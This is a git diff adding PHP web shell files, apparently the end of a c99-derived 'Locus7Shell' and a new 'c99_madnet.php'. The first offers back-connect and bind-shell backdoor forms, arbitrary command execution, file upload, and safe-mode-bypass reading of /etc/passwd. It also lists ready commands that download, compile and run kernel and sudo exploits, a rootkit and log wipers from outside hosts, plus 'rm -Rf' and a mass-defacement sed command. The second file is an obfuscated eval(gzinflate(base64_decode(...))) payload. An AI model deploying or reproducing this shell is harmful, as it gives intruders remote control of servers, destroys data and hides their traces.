+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";} 
+if ($act == "backc")
+{
+ $ip = $_SERVER["REMOTE_ADDR"];
+ $msg = $_POST['backcconnmsg'];
+ $emsg = $_POST['backcconnmsge'];
+ echo("<center><b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br></center>");
+ echo("$msg");
+ echo("$emsg");
+}
+
+if ($act == "shbd"){
+$msg = $_POST['backcconnmsg'];
+$emsg = $_POST['backcconnmsge'];
+echo("<center><b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>
+Bind Port: <input type='text' name='backconnectport' value='5992'>
+<input type='hidden' name='use' value='shbd'>
+<input type='submit' value='Install Backdoor'></form>");
+echo("$msg");
+echo("$emsg");
+echo("</center>");
+} ?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td width="100%" height="1" valign="top" colspan="2"></td></tr> 
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> 
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"></td></tr> 
+<tr> 
+  <td width="50%" height="83" valign="top"><center> 
+    <div align="center">Useful Commands  
+    </div> 
+    <form action="<?php echo $surl; ?>"> 
+      <div align="center"> 
+        <input type=hidden name=act value="cmd"> 
+        <input type=hidden name="d" value="<?php echo $dispd; ?>"> 
+          <SELECT NAME="cmd"> 
+            <OPTION VALUE="uname -a">Kernel version 
+              <OPTION VALUE="w">Logged in users 
+                <OPTION VALUE="lastlog">Last to connect 
+                  <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins 
+                    <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! 
+                    <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? 
+                    <OPTION VALUE="which wget curl w3m lynx">Downloaders? 
+                    <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO 
+                    <OPTION VALUE="netstat -atup | grep IST">Open ports 
+                    <OPTION VALUE="locate gcc">gcc installed? 
+                    <OPTION VALUE="rm -Rf">Format box (DANGEROUS) 
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) 
+                    <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 
+                    <OPTION VALUE="./zap2">WIPELOGS PT3 
+                    <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) 
+                    <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) 
+                    <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) 
+                    <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) 
+                    <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) 
+                    <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) 
+                    <OPTION VALUE="wget http://precision-gaming.com/sudo.c">wget Linux sudo stack overflow
+                    <OPTION VALUE="gcc sudo.c -o sudosploit">Compile Linux sudo sploit
+                    <OPTION VALUE="./sudosploit">Execute Sudosploit
+                    <OPTION VALUE="wget http://twofaced.org/linux2-6-all.c">Linux Kernel 2.6.* rootkit.c
+                    <OPTION VALUE="gcc linux2-6-all.c -o linuxkernel">Compile Linux2-6-all.c
+                    <OPTION VALUE="./linuxkernel">Run Linux2-6-all.c
+                    <OPTION VALUE="wget http://twofaced.org/mig-logcleaner.c">Mig LogCleaner
+                    <OPTION VALUE="gcc -DLINUX -WALL mig-logcleaner.c -o migl">Compile Mig LogCleaner
+                    <OPTION VALUE="./migl -u root 0">Compile Mig LogCleaner
+                    <OPTION VALUE="sed -i -e 's/<html>/<div style=\'position\:absolute\;width\:2000px\;height\:2000px\;background-color\:black\'><br><br><br><br>&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;<img src=\'http://img244.imageshack.us/img244/6663/locus7sgm8.jpg\'><br><font size=\'10\' color=\'green\'>&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;<font size=\'10\' color=\'green\'>HACKED BY <a href=\'http\:\/\/locus7s.com\'>LOCUS7S<\/a><\/font><\/div><meta http-equiv=\'refresh\' content=\'5\\;url=http\:\/\/locus7s.com\'>/g' index.*">index.* Mass Defacement
+                  </SELECT> 
+        <input type=hidden name="cmd_txt" value="1"> 
+        &nbsp; 
+        <input type=submit name=submit value="Execute"> 
+          <br> 
+        Warning. Kernel may be alerted using higher levels </div> 
+    </form> 
+    </td> 
+  <td width="50%" height="83" valign="top"><center> 
+   <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> 
+      <input name="q" type="text" id="q" size="80" value="<?php echo wordwrap(php_uname()); ?>"> 
+      <input type="hidden" name="client" value="firefox-a"> 
+      <input type="hidden" name="rls" value="org.mozilla:en-US:official"> 
+      <input type="hidden" name="hl" value="en"> 
+      <input type="hidden" name="hs" value="b7p"> 
+      <input type=submit name="btnG" VALUE="Search"> 
+    </form></center> 
+    </td> 
+</tr></TABLE><br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"></td></tr> 
+<tr> 
+  <td width="50%" height="83" valign="top"><center> 
+    <div align="center">Php Safe-Mode Bypass (Read Files) 
+    </div><br> 
+    <form action="<?php echo $surl; ?>"> 
+      <div align="center"> 
+      File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> 
+       
+       
+       
+            
+       
+       
+      <? 
+       
+      function rsg_read()
+    {    
+    $test="";
+    $temp=tempnam($test, "cx");
+    $file=$_GET['file'];    
+    $get=htmlspecialchars($file);
+    echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+    if(copy("compress.zlib://".$file, $temp)){
+    $fichier = fopen($temp, "r");
+    $action = fread($fichier, filesize($temp));
+    fclose($fichier);
+    $source=htmlspecialchars($action);
+    echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
+    unlink($temp);
+    } else {
+    die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+    <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+    access.</CENTER></FONT>");
+            }
+    echo "</div>";
+    } 
+     
+    if(isset($_GET['file']))
+{
+rsg_read();
+} 
+     
+    ?> 
+     
+    <? 
+     
+    function rsg_glob()
+{
+$chemin=$_GET['directory'];
+$files = glob("$chemin*");
+echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+    echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+} 
+
+if(isset($_GET['directory']))
+{
+rsg_glob();
+} 
+
+?> 
+
+          <br> 
+      </div> 
+    </form> 
+    </td> 
+  <td width="50%" height="83" valign="top"><center> 
+   <center>Php Safe-Mode Bypass (List Directories):     <form action="<?php echo $surl; ?>"> 
+      <div align="center"><br> 
+      Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> 
+
+    </form></center> 
+    </td> 
+</tr></TABLE> 
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr> 
+ <td width="50%" height="1" valign="top"><center>Search<form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> 
+ <td width="50%" height="1" valign="top"><center>Upload<form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> 
+</tr> 
+</table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Make Dir<form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>Make File<form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Go Dir<form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>Go File<form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ x2300 Locus7Shell v. <?php echo $shver; ?> <a href="http://www.locus7s.com/"><u><b>Modded by</b></u></a> #!physx^  | <a href="http://www.locus7s.com">www.LOCUS7S.com</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table> 
+</body></html><?php chdir($lastdir); c99shexit(); ?> 
\ No newline at end of file
diff --git a/php/c99_madnet.php b/php/c99_madnet.php
new file mode 100644
index 0000000..a55fbef
--- /dev/null
+++ b/php/c99_madnet.php
@@ -0,0 +1,7 @@
+<?PHP
+             //Authentication
+$login = "user"; //Login
+$pass = "pass";  //Pass
+$md5_pass = ""; //If no pass then hash
+eval(gzinflate(base64_decode('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